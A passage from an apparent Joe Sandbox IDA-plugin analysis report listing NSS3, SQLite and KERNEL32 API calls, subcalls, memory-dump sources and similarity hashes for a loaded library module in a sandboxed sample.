                                                                                                                                                                                                                              • Part of subcall function 6CBC10C0: PL_ArenaAllocate.NSS3(?,?,?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC1141
                                                                                                                                                                                                                              • Part of subcall function 6CBC10C0: PR_Unlock.NSS3(?,?,?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC1182
                                                                                                                                                                                                                              • Part of subcall function 6CBC10C0: TlsGetValue.KERNEL32(?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC119C
                                                                                                                                                                                                                            • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6CC88FA0,00000000,?,?,?,?,6CB67D8F,?,?), ref: 6CB66DF7
                                                                                                                                                                                                                              • Part of subcall function 6CBBB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CC918D0,?), ref: 6CBBB095
                                                                                                                                                                                                                            • SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6CB66E35
                                                                                                                                                                                                                              • Part of subcall function 6CBBFDF0: PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6CBBFE29
                                                                                                                                                                                                                              • Part of subcall function 6CBBFDF0: PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6CBBFE3D
                                                                                                                                                                                                                              • Part of subcall function 6CBBFDF0: free.MOZGLUE(00000000,?,?,?,?), ref: 6CBBFE6F
                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6CB66E4C
                                                                                                                                                                                                                              • Part of subcall function 6CBC10C0: PL_ArenaAllocate.NSS3(?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC116E
                                                                                                                                                                                                                            • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6CC88FE0,00000000), ref: 6CB66E82
                                                                                                                                                                                                                              • Part of subcall function 6CB66AF0: SECITEM_ArenaDupItem_Util.NSS3(00000000,6CB6B21D,00000000,00000000,6CB6B219,?,6CB66BFB,00000000,?,00000000,00000000,?,?,?,6CB6B21D), ref: 6CB66B01
                                                                                                                                                                                                                              • Part of subcall function 6CB66AF0: SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,00000000), ref: 6CB66B8A
                                                                                                                                                                                                                            • SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6CB66F1E
                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6CB66F35
                                                                                                                                                                                                                            • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6CC88FE0,00000000), ref: 6CB66F6B
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE005,00000000,6CB67D8F,?,?), ref: 6CB66FE1
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Util$Arena$Item_$Alloc_$DecodeQuick$AllocateErrorValue$CriticalEnterSectionUnlockfreememcpy
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 587344769-0
                                                                                                                                                                                                                            • Opcode ID: eb92cb0f5857d3a2b8eeb7281f3845a9d9c925e8c8722221f0c35ddb91247d78
                                                                                                                                                                                                                            • Instruction ID: 0f0b0f7d2afeacdd5b0e0d7c777250845a884eec47d704546addd6321d862271
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: eb92cb0f5857d3a2b8eeb7281f3845a9d9c925e8c8722221f0c35ddb91247d78
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FC717071E106869FDB00CF16CD50BAABBA8FF94308F154229E858DBB11F770E994CB91
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • TlsGetValue.KERNEL32(?,6CB8CDBB,?,6CB8D079,00000000,00000001), ref: 6CBAAE10
                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?,?,6CB8CDBB,?,6CB8D079,00000000,00000001), ref: 6CBAAE24
                                                                                                                                                                                                                            • PR_Unlock.NSS3(?,?,?,?,?,?,6CB8D079,00000000,00000001), ref: 6CBAAE5A
                                                                                                                                                                                                                            • memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6CB8CDBB,?,6CB8D079,00000000,00000001), ref: 6CBAAE6F
                                                                                                                                                                                                                            • free.MOZGLUE(85145F8B,?,?,?,?,6CB8CDBB,?,6CB8D079,00000000,00000001), ref: 6CBAAE7F
                                                                                                                                                                                                                            • TlsGetValue.KERNEL32(?,6CB8CDBB,?,6CB8D079,00000000,00000001), ref: 6CBAAEB1
                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6CB8CDBB,?,6CB8D079,00000000,00000001), ref: 6CBAAEC9
                                                                                                                                                                                                                            • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6CB8CDBB,?,6CB8D079,00000000,00000001), ref: 6CBAAEF1
                                                                                                                                                                                                                            • free.MOZGLUE(6CB8CDBB,?,?,?,?,?,?,?,?,?,?,?,?,?,6CB8CDBB,?), ref: 6CBAAF0B
                                                                                                                                                                                                                            • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6CB8CDBB,?,6CB8D079,00000000,00000001), ref: 6CBAAF30
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Unlock$CriticalEnterSectionValuefree$memset
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 161582014-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • TlsGetValue.KERNEL32(?,00000000,00000000,?,6CB8AB7F,?,00000000,?), ref: 6CB84CB4
                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(0000001C,?,6CB8AB7F,?,00000000,?), ref: 6CB84CC8
                                                                                                                                                                                                                            • TlsGetValue.KERNEL32(?,6CB8AB7F,?,00000000,?), ref: 6CB84CE0
                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?,?,6CB8AB7F,?,00000000,?), ref: 6CB84CF4
                                                                                                                                                                                                                            • PL_HashTableLookup.NSS3(?,?,?,6CB8AB7F,?,00000000,?), ref: 6CB84D03
                                                                                                                                                                                                                            • PR_Unlock.NSS3(?,00000000,?), ref: 6CB84D10
                                                                                                                                                                                                                              • Part of subcall function 6CC0DD70: TlsGetValue.KERNEL32 ref: 6CC0DD8C
                                                                                                                                                                                                                              • Part of subcall function 6CC0DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CC0DDB4
                                                                                                                                                                                                                            • PR_Now.NSS3(?,00000000,?), ref: 6CB84D26
                                                                                                                                                                                                                              • Part of subcall function 6CC29DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6CC70A27), ref: 6CC29DC6
                                                                                                                                                                                                                              • Part of subcall function 6CC29DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6CC70A27), ref: 6CC29DD1
                                                                                                                                                                                                                              • Part of subcall function 6CC29DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CC29DED
                                                                                                                                                                                                                            • PR_Unlock.NSS3(?,?,00000000,?), ref: 6CB84D98
                                                                                                                                                                                                                            • PR_Unlock.NSS3(?,?,?,00000000,?), ref: 6CB84DDA
                                                                                                                                                                                                                            • PR_Unlock.NSS3(?,?,?,?,00000000,?), ref: 6CB84E02
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Unlock$CriticalSectionTimeValue$EnterSystem$FileHashLeaveLookupTableUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 4032354334-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • sqlite3_initialize.NSS3 ref: 6CB4FD18
                                                                                                                                                                                                                            • sqlite3_initialize.NSS3 ref: 6CB4FD5F
                                                                                                                                                                                                                            • memset.VCRUNTIME140(00000000,00000000,?), ref: 6CB4FD89
                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(00000000,00000000,?), ref: 6CB4FD99
                                                                                                                                                                                                                            • sqlite3_free.NSS3(00000000), ref: 6CB4FE3C
                                                                                                                                                                                                                            • sqlite3_free.NSS3(?), ref: 6CB4FEE3
                                                                                                                                                                                                                            • sqlite3_free.NSS3(?), ref: 6CB4FEEE
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: sqlite3_free$sqlite3_initialize$memcpymemset
                                                                                                                                                                                                                            • String ID: simple
                                                                                                                                                                                                                            • API String ID: 1130978851-3246079234
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6CB55EC9
                                                                                                                                                                                                                            • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,000296F7,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CB55EED
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            • unable to close due to unfinalized statements or unfinished backups, xrefs: 6CB55E64
                                                                                                                                                                                                                            • API call with %s database connection pointer, xrefs: 6CB55EC3
                                                                                                                                                                                                                            • invalid, xrefs: 6CB55EBE
                                                                                                                                                                                                                            • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CB55ED1
                                                                                                                                                                                                                            • misuse, xrefs: 6CB55EDB
                                                                                                                                                                                                                            • %s at line %d of [%.10s], xrefs: 6CB55EE0
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: sqlite3_log
                                                                                                                                                                                                                            • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse$unable to close due to unfinalized statements or unfinished backups
                                                                                                                                                                                                                            • API String ID: 632333372-1982981357
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • _byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CB3DDF9
                                                                                                                                                                                                                            • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00012806,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CB3DE68
                                                                                                                                                                                                                            • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001280D,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CB3DE97
                                                                                                                                                                                                                            • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6CB3DEB6
                                                                                                                                                                                                                            • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CB3DF78
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _byteswap_ulongsqlite3_log$_byteswap_ushort
                                                                                                                                                                                                                            • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(?,00000100,?), ref: 6CBACD08
                                                                                                                                                                                                                            • PK11_DoesMechanism.NSS3(?,?), ref: 6CBACE16
                                                                                                                                                                                                                            • PR_SetError.NSS3(00000000,00000000), ref: 6CBAD079
                                                                                                                                                                                                                              • Part of subcall function 6CC0C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CC0C2BF
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: DoesErrorK11_MechanismValuememcpy
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • PORT_Alloc_Util.NSS3(0000000C,?,?,00000000,?,6CBA97C1,?,00000000,00000000,?,?,?,00000000,?,6CB87F4A,00000000), ref: 6CB9DC68
                                                                                                                                                                                                                              • Part of subcall function 6CBC0BE0: malloc.MOZGLUE(6CBB8D2D,?,00000000,?), ref: 6CBC0BF8
                                                                                                                                                                                                                              • Part of subcall function 6CBC0BE0: TlsGetValue.KERNEL32(6CBB8D2D,?,00000000,?), ref: 6CBC0C15
                                                                                                                                                                                                                            • PORT_Alloc_Util.NSS3(00000008,00000000,?,?,?,00000000,?,6CB87F4A,00000000,?,00000000,00000000), ref: 6CB9DD36
                                                                                                                                                                                                                            • PORT_Alloc_Util.NSS3(?,00000000,?,?,?,00000000,?,6CB87F4A,00000000,?,00000000,00000000), ref: 6CB9DE2D
                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(00000000,00000000,?,?,00000000,?,?,?,00000000,?,6CB87F4A,00000000,?,00000000,00000000), ref: 6CB9DE43
                                                                                                                                                                                                                            • PORT_Alloc_Util.NSS3(0000000C,00000000,?,?,?,00000000,?,6CB87F4A,00000000,?,00000000,00000000), ref: 6CB9DE76
                                                                                                                                                                                                                            • PORT_Alloc_Util.NSS3(?,00000000,?,?,?,00000000,?,6CB87F4A,00000000,?,00000000,00000000), ref: 6CB9DF32
                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(-00000010,00000000,00000000,?,00000000,?,?,?,00000000,?,6CB87F4A,00000000,?,00000000,00000000), ref: 6CB9DF5F
                                                                                                                                                                                                                            • PORT_Alloc_Util.NSS3(00000004,00000000,?,?,?,00000000,?,6CB87F4A,00000000,?,00000000,00000000), ref: 6CB9DF78
                                                                                                                                                                                                                            • PORT_Alloc_Util.NSS3(00000010,00000000,?,?,?,00000000,?,6CB87F4A,00000000,?,00000000,00000000), ref: 6CB9DFAA
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Alloc_Util$memcpy$Valuemalloc
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • PK11_GetCertFromPrivateKey.NSS3(?), ref: 6CB73C76
                                                                                                                                                                                                                            • CERT_DestroyCertificate.NSS3(00000000), ref: 6CB73C94
                                                                                                                                                                                                                              • Part of subcall function 6CB695B0: TlsGetValue.KERNEL32(00000000,?,6CB800D2,00000000), ref: 6CB695D2
                                                                                                                                                                                                                              • Part of subcall function 6CB695B0: EnterCriticalSection.KERNEL32(?,?,?,6CB800D2,00000000), ref: 6CB695E7
                                                                                                                                                                                                                              • Part of subcall function 6CB695B0: PR_Unlock.NSS3(?,?,?,?,6CB800D2,00000000), ref: 6CB69605
                                                                                                                                                                                                                            • PORT_NewArena_Util.NSS3(00000800), ref: 6CB73CB2
                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(00000000,000000AC), ref: 6CB73CCA
                                                                                                                                                                                                                            • memset.VCRUNTIME140(00000000,00000000,000000AC), ref: 6CB73CE1
                                                                                                                                                                                                                              • Part of subcall function 6CB73090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6CB8AE42), ref: 6CB730AA
                                                                                                                                                                                                                              • Part of subcall function 6CB73090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CB730C7
                                                                                                                                                                                                                              • Part of subcall function 6CB73090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6CB730E5
                                                                                                                                                                                                                              • Part of subcall function 6CB73090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CB73116
                                                                                                                                                                                                                              • Part of subcall function 6CB73090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6CB7312B
                                                                                                                                                                                                                              • Part of subcall function 6CB73090: PK11_DestroyObject.NSS3(?,?), ref: 6CB73154
                                                                                                                                                                                                                              • Part of subcall function 6CB73090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CB7317E
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Util$Arena_$Alloc_ArenaDestroyK11_memset$AlgorithmCertCertificateCopyCriticalEnterFreeFromItem_ObjectPrivateSectionTag_UnlockValue
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • PORT_ZAlloc_Util.NSS3(C901896B), ref: 6CB62C5D
                                                                                                                                                                                                                              • Part of subcall function 6CBC0D30: calloc.MOZGLUE ref: 6CBC0D50
                                                                                                                                                                                                                              • Part of subcall function 6CBC0D30: TlsGetValue.KERNEL32 ref: 6CBC0D6D
                                                                                                                                                                                                                            • CERT_NewTempCertificate.NSS3(?,?,00000000,00000000,00000001), ref: 6CB62C8D
                                                                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CB62CE0
                                                                                                                                                                                                                              • Part of subcall function 6CB62E00: SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6CB62CDA,?,00000000), ref: 6CB62E1E
                                                                                                                                                                                                                              • Part of subcall function 6CB62E00: SECITEM_DupItem_Util.NSS3(?), ref: 6CB62E33
                                                                                                                                                                                                                              • Part of subcall function 6CB62E00: TlsGetValue.KERNEL32 ref: 6CB62E4E
                                                                                                                                                                                                                              • Part of subcall function 6CB62E00: EnterCriticalSection.KERNEL32(?), ref: 6CB62E5E
                                                                                                                                                                                                                              • Part of subcall function 6CB62E00: PL_HashTableLookup.NSS3(?), ref: 6CB62E71
                                                                                                                                                                                                                              • Part of subcall function 6CB62E00: PL_HashTableRemove.NSS3(?), ref: 6CB62E84
                                                                                                                                                                                                                              • Part of subcall function 6CB62E00: PL_HashTableAdd.NSS3(?,00000000), ref: 6CB62E96
                                                                                                                                                                                                                              • Part of subcall function 6CB62E00: PR_Unlock.NSS3 ref: 6CB62EA9
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CB62D23
                                                                                                                                                                                                                            • CERT_IsCACert.NSS3(00000001,00000000), ref: 6CB62D30
                                                                                                                                                                                                                            • CERT_MakeCANickname.NSS3(00000001), ref: 6CB62D3F
                                                                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6CB62D73
                                                                                                                                                                                                                            • CERT_DestroyCertificate.NSS3(?), ref: 6CB62DB8
                                                                                                                                                                                                                            • free.MOZGLUE ref: 6CB62DC8
                                                                                                                                                                                                                              • Part of subcall function 6CB63E60: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CB63EC2
                                                                                                                                                                                                                              • Part of subcall function 6CB63E60: SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6CB63ED6
                                                                                                                                                                                                                              • Part of subcall function 6CB63E60: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6CB63EEE
                                                                                                                                                                                                                              • Part of subcall function 6CB63E60: PR_CallOnce.NSS3(6CCC2AA4,6CBC12D0), ref: 6CB63F02
                                                                                                                                                                                                                              • Part of subcall function 6CB63E60: PL_FreeArenaPool.NSS3 ref: 6CB63F14
                                                                                                                                                                                                                              • Part of subcall function 6CB63E60: SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CB63F27
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Util$Item_$HashTable$ArenaCertificatePoolValueZfreefree$Alloc_CallCertCopyCriticalDecodeDestroyEnterErrorFreeInitLookupMakeNicknameOnceQuickRemoveSectionTempUnlockcalloc
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3941837925-0
                                                                                                                                                                                                                            • Opcode ID: 0954c0210b0eb70af06408d7f7e2d8edc6114245c212698e1177572514ab9d21
                                                                                                                                                                                                                            • Instruction ID: 2b8817d02e7fae152445717093e3b1c6b0f42e6073b7d49281233d414e6d36a4
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0954c0210b0eb70af06408d7f7e2d8edc6114245c212698e1177572514ab9d21
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8851BE71A042619BEB119F6ADC89B5B77E5EF84348F140428EC5993A50EB31E8158B93
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 6CB640D0: SECOID_FindOIDByTag_Util.NSS3(?,?,?,?,?,6CB63F7F,?,00000055,?,?,6CB61666,?,?), ref: 6CB640D9
                                                                                                                                                                                                                              • Part of subcall function 6CB640D0: SECITEM_CompareItem_Util.NSS3(00000000,?,?,?,6CB61666,?,?), ref: 6CB640FC
                                                                                                                                                                                                                              • Part of subcall function 6CB640D0: PR_SetError.NSS3(FFFFE023,00000000,?,?,6CB61666,?,?), ref: 6CB64138
                                                                                                                                                                                                                            • PR_GetCurrentThread.NSS3 ref: 6CB67CFD
